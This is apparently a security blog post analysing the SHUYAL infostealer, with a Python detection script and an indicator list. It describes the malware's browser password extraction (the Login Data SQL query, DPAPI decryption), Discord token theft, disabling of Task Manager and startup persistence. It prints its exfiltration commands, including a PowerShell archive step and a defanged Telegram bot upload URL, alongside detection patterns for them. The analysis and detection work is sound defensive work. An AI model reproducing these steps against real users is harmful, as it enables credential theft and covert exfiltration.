Monday, January 19, 2026

Stealing Login Credentials from 19 Main Browsers


A sophisticated new data stealer named SHUYAL was recently discovered by Hybrid Analysis.

It has demonstrated extensive credential-extraction capabilities against 19 different web browsers, including popular ones such as Google Chrome, Microsoft Edge, Opera, Brave, and Yandex, as well as more specialised ones such as Opera GX, Vivaldi, Chromium, Waterfox, Tor, Epic Privacy Browser, Comodo Dragon, Slimjet, Coc Coc, Maxthon, 360 Secure Browser, UR Browser, Avast Secure Browser, and Falkon.

Named after distinctive identifiers in the executable's PDB path, which also references a "sheepy" username, SHUYAL represents a previously undocumented threat that combines comprehensive browser targeting with advanced system reconnaissance.

PDB path extracted in the Hybrid Analysis report

Advanced Capabilities in Credential Theft

The malware performs detailed enumeration of hardware components, retrieving the models and serial numbers of disk drives via WMIC commands, along with descriptions and device IDs for keyboards, pointing devices such as mice, and desktop monitors.

This reconnaissance extends to querying the desktop wallpaper path using PowerShell, although incomplete commands like "wmic get name" yield no actionable data.

Beyond hardware profiling, SHUYAL captures screenshots using GDI+ APIs such as GdiplusStartup, BitBlt, and GdipSaveImageToFile, saving them as "ss.png", and extracts clipboard contents via OpenClipboard and GetClipboardData, storing them in "clipboard.txt".

It further targets the Discord applications Standard, Canary, and PTB, stealing authentication tokens, which are logged alongside browser data in files like "tokens.txt" and "debug_log.txt" inside a temporary "runtime" directory.

Multiple browsers are targeted by the stealer

SHUYAL's operational sophistication is evident in its evasion tactics, including the aggressive termination of the Windows Task Manager process via TerminateProcess calls, followed by disabling it entirely by setting the "DisableTaskMgr" registry value to 1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System.

This prevents users from monitoring or interrupting the malware's activity. For persistence, the stealer uses the SHGetSpecialFolderPathA API to locate the user's Startup folder (CSIDL_STARTUP) and copies itself there with CopyFileA, ensuring automatic execution on startup.

Credential theft is executed meticulously: the malware locates the "Login Data" databases of the targeted browsers, copies them to the current directory (e.g., "chrome_Data.db" for Chrome), and runs SQL queries such as "SELECT origin_url, username_value, password_value FROM logins" to extract credentials.

Passwords are decrypted using the browser's master key from the "Local State" file, which is Base64-decoded and then unwrapped with DPAPI's CryptUnprotectData; the results are saved in "saved_passwords.txt".

Browsing history is similarly pilfered from files like "User Data\Default\History" and saved as "history.txt", demonstrating a thorough approach to data aggregation.

Self-Deletion Mechanisms

To maintain stealth, SHUYAL employs modern exfiltration methods, compressing the "runtime" directory into "runtime.zip" via PowerShell's Compress-Archive cmdlet and transmitting it to a Telegram bot at hxxps://api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjQ/sendDocument?chat_id=-1002503889864.

This combines Discord token theft with Telegram-based data relay, ensuring efficient command-and-control communication.

Network events are monitored using WSAEnumNetworkEvents for socket-based detection, adding another layer of operational awareness.

According to the report, post-exfiltration the malware deletes traces by removing the created database copies and runtime files, enhancing its anti-forensic profile.

Finally, self-deletion is achieved via a batch script, "util.bat", which uses commands like "timeout /t 1 /nobreak >nul" and "del /f /q" to erase the executable itself after a delay, leaving minimal footprints.

This in-depth examination, combining Hybrid Analysis's behavioral indicators with static and dynamic disassembly, underscores SHUYAL's role as a versatile infostealer.

It not only grabs credentials but also conducts system reconnaissance, evades detection, and exfiltrates data stealthily, posing significant risks to users across many browser ecosystems.

Security teams are advised to monitor for these patterns, leveraging vetted access to Hybrid Analysis for sample downloads and further reverse engineering to develop robust defenses against such threats.
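The behaviours described above (WMIC hardware enumeration, the PowerShell wallpaper query, the DisableTaskMgr policy value, the Startup-folder copy, Compress-Archive over the Temp\runtime staging directory, and the Telegram sendDocument upload) map directly onto process, registry, file and network telemetry. The script below is an added example, not code from the Hybrid Analysis report or from this article: it runs those patterns over a few constructed telemetry lines and only raises a verdict when several distinct behaviours co-occur, since a lone wmic or Compress-Archive call is ordinary administrative noise. The "kind|detail" line format, the username "alice", the file name "updater.exe" and the <TOKEN>/<CHAT_ID> placeholders are all constructed for the example; real EDR or Sysmon events would need their own parser in front of match_events().

```python
"""Flag SHUYAL-style behaviour in endpoint telemetry (added example).

The "kind|detail" telemetry format is constructed for illustration.
"""
import re
from collections import Counter

# Each rule: (telemetry kind, human-readable name, pattern over the detail field).
RULES = [
    ("process", "wmic hardware enumeration",
     re.compile(r"^wmic\s+(diskdrive\s+get|path\s+Win32_(Keyboard|PointingDevice|DesktopMonitor)\s+get)", re.I)),
    ("process", "wallpaper path query via PowerShell",
     re.compile(r"Get-ItemProperty\s+'HKCU:\\Control Panel\\Desktop'\)\.Wallpaper", re.I)),
    ("process", "Compress-Archive of Temp\\runtime staging directory",
     re.compile(r"Compress-Archive\s.*\\Temp\\runtime\\\*", re.I)),
    ("registry", "Task Manager disabled via DisableTaskMgr=1",
     re.compile(r"\\Policies\\System\\DisableTaskMgr\s*=\s*1$", re.I)),
    ("file", "executable written to user Startup folder",
     re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.exe$", re.I)),
    ("network", "Telegram bot sendDocument upload",
     re.compile(r"api\.telegram\.org/bot[^/\s]+/sendDocument", re.I)),
]

# Constructed sample telemetry; "alice", "updater.exe", <TOKEN> and <CHAT_ID>
# are placeholders, not values from the report.
SAMPLE_TELEMETRY = r"""
process|wmic diskdrive get model,serialnumber
process|wmic path Win32_Keyboard get Description,DeviceID
process|powershell -command "(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper"
registry|HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr=1
file|C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe
process|powershell -Command "Compress-Archive -Path 'C:\Users\alice\AppData\Local\Temp\runtime\*' -DestinationPath 'C:\Users\alice\AppData\Local\Temp\runtime.zip' -Force"
network|POST https://api.telegram.org/bot<TOKEN>/sendDocument?chat_id=<CHAT_ID>
process|cmd /c util.bat
process|notepad.exe C:\Users\alice\notes.txt
""".strip().splitlines()


def parse_event(line):
    """Split a constructed 'kind|detail' line into its two fields."""
    kind, _, detail = line.partition("|")
    return kind.strip().lower(), detail.strip()


def match_events(lines):
    """Return (rule name, detail) for every telemetry line that triggers a rule."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        kind, detail = parse_event(line)
        for rule_kind, name, pattern in RULES:
            if kind == rule_kind and pattern.search(detail):
                hits.append((name, detail))
    return hits


def assess(lines, threshold=3):
    """Correlate rule hits; the verdict needs `threshold` distinct behaviours.

    Counting distinct rules rather than raw hits keeps repeated wmic calls
    from a single inventory script from tripping the verdict on their own.
    """
    hits = match_events(lines)
    rule_counts = Counter(name for name, _ in hits)
    sources = sorted({kind for kind, name, _ in RULES if name in rule_counts})
    verdict = ("SHUYAL-like activity" if len(rule_counts) >= threshold
               else "below threshold")
    return {
        "hits": hits,
        "distinct_rules": sorted(rule_counts),
        "sources": sources,
        "verdict": verdict,
    }


if __name__ == "__main__":
    result = assess(SAMPLE_TELEMETRY)
    for name, detail in result["hits"]:
        print(f"[{name}] {detail}")
    print(result["verdict"], "-", len(result["distinct_rules"]), "distinct behaviours")
```

Running the block on the constructed lines produces seven hits across six distinct rules and all four telemetry sources, so the verdict fires; the same rules applied to the two wmic lines alone stay below the threshold, which is the property a production rule should keep to avoid paging on routine inventory jobs.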

Indicators of Compromise (IOCs)

Category: Indicator

SHA256: 810d4850ee216df639648a37004a0d4d1275a194924fa53312d3403be97edf5c

Files Created:
  C:\Users\<user>\AppData\Local\Temp\runtime\browser\debug_log.txt
  C:\Users\<user>\AppData\Local\Temp\runtime\browser\tokens.txt
  C:\Users\<user>\AppData\Local\Temp\runtime\clipboard\clipboard.txt
  C:\Users\<user>\AppData\Local\Temp\runtime\history\history.txt
  C:\Users\<user>\AppData\Local\Temp\runtime\passwords\saved_passwords.txt
  C:\Users\<user>\AppData\Local\Temp\runtime\pic\ss.png
  C:\Users\<user>\AppData\Local\Temp\runtime.zip
  util.bat

Processes Spawned:
  wmic diskdrive get model,serialnumber
  wmic path Win32_Keyboard get Description,DeviceID
  wmic path Win32_PointingDevice get Description,PNPDeviceID
  wmic path Win32_DesktopMonitor get Description,PNPDeviceID
  wmic get name
  powershell -command "(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper"
  powershell -Command "Compress-Archive -Path 'C:\Users\<user>\AppData\Local\Temp\runtime\*' -DestinationPath 'C:\Users\<user>\AppData\Local\Temp\runtime.zip' -Force"

Telegram Bot: hxxps[:]//api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjQ/sendDocument?chat_id=-1002503889864
